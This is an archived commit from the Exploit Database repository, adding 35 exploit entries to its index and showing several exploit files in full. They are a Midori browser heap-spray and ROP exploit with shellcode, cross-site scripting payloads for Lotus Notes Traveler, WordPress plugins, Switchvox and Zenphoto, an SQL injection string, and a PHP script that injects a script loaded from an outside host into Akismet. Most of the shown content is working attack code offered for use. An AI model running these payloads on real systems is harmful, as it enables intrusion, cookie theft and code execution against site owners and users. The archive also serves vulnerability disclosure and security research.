Skip to content
This repository has been archived by the owner on Nov 28, 2022. It is now read-only.

Commit

Permalink
DB: 2015-08-22
Browse files Browse the repository at this point in the history 
35 new exploits
  • Loading branch information
Offensive Security committed Aug 22, 2015
1 parent 6dccd55 commit 40a9571
Show file tree
Hide file tree
Showing 36 changed files with 2,207 additions and 0 deletions.
35 changes: 35 additions & 0 deletions files.csv
View file
Expand Up @@ -34210,3 +34210,38 @@ id,file,description,date,author,platform,type,port
37893,platforms/windows/dos/37893.py,"Valhala Honeypot 1.8 - Stack-Based Buffer Overflow",2015-08-20,"_ Un_N0n _",windows,dos,21
37894,platforms/php/webapps/37894.html,"Pligg CMS 2.0.2 - Arbitrary Code Execution",2015-08-20,"Arash Khazaei",php,webapps,80
37895,platforms/win64/shellcode/37895.asm,"Win2003 x64 - Token Stealing shellcode - 59 bytes",2015-08-20,"Fitzl Csaba",win64,shellcode,0
37896,platforms/php/webapps/37896.txt,"WordPress ABC Test Plugin 'id' Parameter Cross Site Scripting Vulnerability",2012-09-26,"Scott Herbert",php,webapps,0
37897,platforms/linux/dos/37897.html,"Midori Browser 0.3.2 Denial of Service Vulnerability",2012-09-27,"Ryuzaki Lawlet",linux,dos,0
37898,platforms/windows/local/37898.py,"Reaver Pro Local Privilege Escalation Vulnerability",2012-09-30,infodox,windows,local,0
37899,platforms/php/webapps/37899.txt,"Switchvox Multiple HTML Injection Vulnerabilities",2012-10-02,"Ibrahim El-Sayed",php,webapps,0
37900,platforms/multiple/remote/37900.txt,"IBM Lotus Notes Traveler 8.5.1.x Multiple Input Validation Vulnerabilities",2012-09-28,MustLive,multiple,remote,0
37901,platforms/php/webapps/37901.txt,"AlamFifa CMS 'user_name_cookie' Parameter SQL Injection Vulnerability",2012-09-30,L0n3ly-H34rT,php,webapps,0
37902,platforms/php/webapps/37902.php,"WordPress Akismet Plugin Multiple Cross Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",php,webapps,0
37903,platforms/php/webapps/37903.txt,"Zenphoto 'admin-news-articles.php' Cross Site Scripting Vulnerability",2012-10-02,"Scott Herbert",php,webapps,0
37904,platforms/php/webapps/37904.txt,"Omnistar Mailer Multiple SQL Injection and HTML Injection Vulnerabilities",2012-10-01,"Vulnerability Laboratory",php,webapps,0
37905,platforms/windows/dos/37905.rb,"PowerTCP WebServer for ActiveX Denial of Service Vulnerability",2012-09-28,catatonicprime,windows,dos,0
37907,platforms/php/webapps/37907.txt,"WordPress MDC Private Message Plugin 1.0.0 - Persistent XSS",2015-08-21,"Chris Kellum",php,webapps,80
37909,platforms/windows/dos/37909.txt,"Microsoft Office 2007 wwlib.dll fcPlcfFldMom Uninitialized Heap Usage",2015-08-21,"Google Security Research",windows,dos,0
37910,platforms/windows/dos/37910.txt,"Microsoft Office 2007 wwlib.dll Type Confusion",2015-08-21,"Google Security Research",windows,dos,0
37911,platforms/windows/dos/37911.txt,"Microsoft Office 2007 OGL.dll DpOutputSpanStretch::OutputSpan Out of Bounds Write",2015-08-21,"Google Security Research",windows,dos,0
37912,platforms/windows/dos/37912.txt,"Microsoft Office 2007 MSO.dll Arbitrary Free",2015-08-21,"Google Security Research",windows,dos,0
37913,platforms/windows/dos/37913.txt,"Microsoft Office 2007 MSO.dll Use-After-Free",2015-08-21,"Google Security Research",windows,dos,0
37914,platforms/windows/dos/37914.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write",2015-08-21,"Google Security Research",windows,dos,0
37915,platforms/windows/dos/37915.txt,"Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37916,platforms/windows/dos/37916.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed FDSelect Offset in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37917,platforms/windows/dos/37917.txt,"Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37918,platforms/windows/dos/37918.txt,"Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37919,platforms/windows/dos/37919.txt,"Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow",2015-08-21,"Google Security Research",windows,dos,0
37920,platforms/windows/dos/37920.txt,"Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table",2015-08-21,"Google Security Research",windows,dos,0
37921,platforms/windows/dos/37921.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x3440b / ATMFD+0x3440e) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37922,platforms/windows/dos/37922.txt,"Windows ATMFD.DLL CFF table (ATMFD+0x34072 / ATMFD+0x3407b) Invalid Memory Access",2015-08-21,"Google Security Research",windows,dos,0
37923,platforms/windows/dos/37923.txt,"Windows ATMFD.DLL CharString Stream Out-of-Bounds Reads",2015-08-21,"Google Security Research",windows,dos,0
37924,platforms/windows/dos/37924.txt,"Microsoft Office 2007 MSPTLS Heap Index Integer Underflow",2015-08-21,"Google Security Research",windows,dos,0
37925,platforms/windows/local/37925.txt,"Mozilla Maintenance Service Log File Overwrite Elevation of Privilege",2015-08-21,"Google Security Research",windows,local,0
37926,platforms/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0
37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0
37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload And Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0
37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0
132 changes: 132 additions & 0 deletions platforms/linux/dos/37897.html
View file
@@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/55709/info

The Midori Browser is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users.

Midori Browser 0.3.2 is vulnerable; other versions may also be affected.


it****************************

<html>
<!-- ROP completed--->
<head>
<Title>Ubuntu 11.10 Calc p47l0d -- Rop Completed</title>
<script type="text/javascript">
function ignite() {
var carpet = 0x200;
var vftable = unescape("\x00% u0c10");
var pLand = "% u00fd% u0c10";
var pShell = "% u0000% u0c10";
var oldProt = "% u0000% u0c10";

var heap = unescape("% u0101% u0102"
+"% u0008% u0c10"
+"% u0105% u0106"
+"% u10c2% u7c34"//"% u0107% u0108" pop ecx;pop ecx;ret
+"% u0109% u010a"//
+"% u3134% u6d32"//"% u010b% u010c"//"% u6643% u6d6a" // mov eax,[esi]
+"% u787f% u6d32"//"% u010d% u010e"// xchg eax,esi;aam 0ff;dec ecx;ret
+"% u7b72% u6d83"//"% u010f% u0111" // pop edx;ret
+"% u0000% u0c10"//% u0112% u0113" // will be popped in edx //
+"% u2a30% u6d7f"//"% u0114% u0115" // mov ecx,esi;call [edx+50]
+pLand//"% u0116% u0117" // Address in shellcode to land change it accordingly
+"% ue8d4% u6d7f"//"% u0118% u0119" // mov [ecx],eax;pop ebp;ret
+"% u011a% u011b"// will be popped in ebp
+"% u1b02% u7c34"//"% u011c% u011d" // dec ecx;ret
+"% u1b02% u7c34"//"% u011e% u011f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0120% u0121" // dec ecx;ret
+"% u1b02% u7c34"//"% u0122% u0123" // dec ecx;ret
+"% u4edc% u7c34"//"% u0122% u0123" // pop eax;ret
+oldProt//"% u0124% u0125" // pOldProtection
+"% ue8d4% u6d7f"//"% u0126% u0127" // mov [ecx],eax;pop ebp;ret
+"% u4edb% u7c34"//"% u0128% u0129" // pop ebx;pop eax;ret // needed in initial phase.
+"% u1b02% u7c34"//"% u012a% u012b" // dec ecx;ret
+"% u1b02% u7c34"//"% u012c% u012d" // dec ecx;ret
+"% u4edb% u7c34"//"% u012e% u012f" // pop ebx;pop eax;ret
+"% u2643% u7c34"//"% u0130% u0131" // xchg eax,esp;pop edi;add byte ptr ds:[eax],al;pop ecx,ret
+"% u0040% u0000"//"% u0132% u0133" // newProptection = PAGE_READ_WRITE_EXECUTE
+"% u1b02% u7c34"//"% u0134% u0135" // dec ecx;ret
+"% u1b02% u7c34"//"% u0136% u0137" // dec ecx;ret
+"% ue8d4% u6d7f"//"% u0138% u0139" // mov [ecx],eax;pop ebp;ret
+"% u013a% u013b"// will be popped in ebp
+"% u1b02% u7c34"//"% u013c% u013d" // dec ecx;ret
+"% u1b02% u7c34"//"% u013e% u013f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0140% u0141" // dec ecx;ret
+"% u1b02% u7c34"//"% u0142% u0143" // dec ecx;ret

+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+"% u0000% u0010"//"% u0146% u0147" // Size
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
+"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret

+"% u4edc% u7c34"//"% u0144% u0145" // pop eax;ret
+pShell//"% u0146% u0147" // Address Of Shellcode block to change protection.
+"% ue8d4% u6d7f"//"% u0148% u0149" // mov [ecx],eax;pop ebp;ret
+"% u014a% u014b"// Will be popped in ebp.
/* +"% u1b02% u7c34"//"% u014c% u014d" // dec ecx;ret
+"% u1b02% u7c34"//"% u014e% u014f" // dec ecx;ret
+"% u1b02% u7c34"//"% u0150% u0151" // dec ecx;ret
+"% u1b02% u7c34"//"% u0152% u0153" // dec ecx;ret
*/ +"% u4cc1% u7c34"//"% u0154% u0155" // pop eax;ret
+"% u9611% u7c34"//"% u0156% u0157" // will be popped in eax. pop edi;pop ebx;pop ebp;ret
+"% u347a% u7c34"//"% u0158% u0159" // push esi;push edi;call eax
+"% u4edc% u7c34"//"% u015a% u015b" // pop eax;ret
+"% u00e0% u0c10"//"% u015c% u015d" // will be popped in eax.

/* Need to fix the ebp for proper landing on shellcode */
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret
+"% uc420% u6d99"// dec ebp;ret


+"% u1f0a% u7c34"//"% u015e% u015f" // mov esp,ecx;mov ecx[eax];mov eax,[eax+4];push eax;ret
+"% u0160% u0161"
+"% u28dd% u7c35"//"% u0162% u0163" // VirtualProtect
+"% u0164% u0165"
+"% u0166% u0167"
+"% u0168% u0169"
+"% u016a% u016b"
+"% u016c% u016d"
)
/* Shellcode : */ +unescape("% u9090% u9090% u9090% u9090"
+"% u585b" // pop ebx;pop eax;
+"% u0a05% u0a13% u9000" // add eax,0a130a
+"% u008b" // mov eax,[eax]
+"% u056a" // push 05
+"% uc581% u0128% u0000" // add ebp,114
+"% u9055" // push ebp;nop
+"% u1505% u04d6% u9000" // add eax,4d615
+"% ud0ff" // call eax
+"% uBBBB% uCCCC% uDDDD% uEEEE"
/* command: */ +"% u6163% u636c% u652e% u6578% u0000% ucccc" // calc.exe
);
var vtable = unescape("\x04% u0c10");
while(vtable.length < 0x10000) {vtable += vtable;}
var heapblock = heap+vtable.substring(0,0x10000/2-heap.length*2);
while (heapblock.length<0x80000) {heapblock += heap+heapblock;}
var finalspray = heapblock.substring(0,0x80000 - heap.length - 0x24/2 - 0x4/2 - 0x2/2);
var spray = new Array();
for (var iter=0;iter<carpet;iter++){
spray[iter] = finalspray+heap;
}
/* vulnerability trigger : */
var arrobject = [0x444444444444];
for(;true;){(arrobject[0])++;}
}
</script>
</head>
<body>
<applet src="test.class" width=10 height=10></applet>
<input type=button value="Object++" onclick="ignite()" />
</body>
</html>

********************Exploit****************************

13 changes: 13 additions & 0 deletions platforms/multiple/remote/37900.txt
View file
@@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/55740/info

IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, to control how the site is rendered to the user and conduct phishing attacks. Other attacks are also possible.

IBM Lotus Notes Traveler 8.5.3 and prior are vulnerable; other versions may also be affected.

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=javascript:alert(document.cookie)

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

http://www.example.com/servlet/traveler?deviceType=700&redirectURL=http://websecurity.com.ua
9 changes: 9 additions & 0 deletions platforms/php/webapps/37896.txt
View file
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55689/info

The ABC Test plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ABC Test 0.1 is vulnerable; other versions may also be affected.

http://www.example.com/blog/wp-admin/admin.php?page=abctest&do=edit&id=%22%3E%3Ch1 %3EXSS%3C/h1
25 changes: 25 additions & 0 deletions platforms/php/webapps/37899.txt
View file
@@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/55739/info

Switchvox is prone to multiple HTML-injection vulnerabilities because the application fails to properly sanitize user-supplied input.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible.

Switchvox 5.1.2 vulnerable; other versions may also be affected.

Review: Tools -> Sound Manager -> Create sound [Description]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Groups -> Create Extension Group [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note]
PoC:<iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>

Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note]
PoC: <iframe src="http://www.vulnerability-lab.com" onload=alert(document.cookie)></iframe>
9 changes: 9 additions & 0 deletions platforms/php/webapps/37901.txt
View file
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55746/info

AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.

user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
37 changes: 37 additions & 0 deletions platforms/php/webapps/37902.php
View file
@@ -0,0 +1,37 @@
source: http://www.securityfocus.com/bid/55749/info

The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#

//
// HTTP POST,
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;
?>
9 changes: 9 additions & 0 deletions platforms/php/webapps/37903.txt
View file
@@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/55755/info

Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.

http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>

0 comments on commit 40a9571

Please sign in to comment.